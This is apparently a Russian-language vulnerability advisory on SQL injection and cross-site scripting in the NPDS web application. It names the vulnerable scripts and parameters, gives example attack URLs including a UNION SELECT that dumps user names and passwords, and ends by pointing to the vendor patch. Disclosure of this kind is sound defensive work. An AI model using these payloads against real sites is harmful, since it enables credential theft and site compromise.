SQL-инъекция и межсайтовый скриптинг в NPDS

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

SQL-инъекция существует при обработке входных данных в переменной 'terme' сценария '/modules/glossaire/glossaire.php' и переменной 'query' сценария links.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды в базе данных приложения. Примеры:

http://[target]/modules.php?ModPath=glossaire&ModStar
t=glossaire&op=rech_terme&type=3&terme=''%20='%20
AND%20affiche!='0'%20UNION%20SELECT%200

http://[target]/links.php?op=search&query=google%'%20
UNION%20SELECT%200,un ame,pass,0,0,0,0,0%20
FROM%20users%20where%20uname<>''%20INTO%
20OUTFILE%20'

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/npds/powerpack_f.php?
language=<script>aler t()</script>

http://[target]/faq.php?myfaq=ys&id_cat=99
& categories=<script>alert()</script>

URL производителя: www.npds.org

Решение: Установите исправление от производителя.